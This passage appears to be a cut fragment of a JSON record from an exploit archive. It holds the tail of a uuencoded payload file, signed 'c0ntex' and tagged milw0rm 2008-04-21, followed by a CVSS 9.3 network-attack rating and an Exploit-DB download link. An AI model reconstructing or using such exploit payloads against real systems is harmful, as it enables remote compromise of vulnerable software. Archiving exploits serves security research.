XNQ\nML;&Q9V=G9WM[>WNNKJZN7EY>7BTM+2T6%A862DI*2CX^/CYE965E9V=G9[JZ\nMNKK?W]_?+BXN+E]?7U^&AH:&T='1T:ZNKJXK*RLK`0$!`2HJ*BKR\\O+RBHJ*\nMB@$!`0$R,C(RYN;FYLS,S,R#@X.#T='1T6YN;FZ7EY>7BHJ*BEI:6EKN[N[N\nMK*RLK.+BXN)F9F9FL;&QL186%A9\\?'Q\\.CHZ.KBXN+BNKJZN<G)R<MG9V=DN\nM+BXN7%Q<7-K:VMHR,C(R'AX>'JVMK:V.CHZ.!04%!8:&AH:_O[^_='1T=-#0\nMT-#@X.#@<'!P<'5U=76]O;V]C8V-C49&1D;FYN;F.3DY.<#`P,!\"0D)\"\\O+R\n1\\C\\_/S_N[N[N)R<G)XJ*BHH`\n`\nend\n\n\n\nregards\nc0ntex\n\n# milw0rm.com [2008-04-21]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/5479/"}]}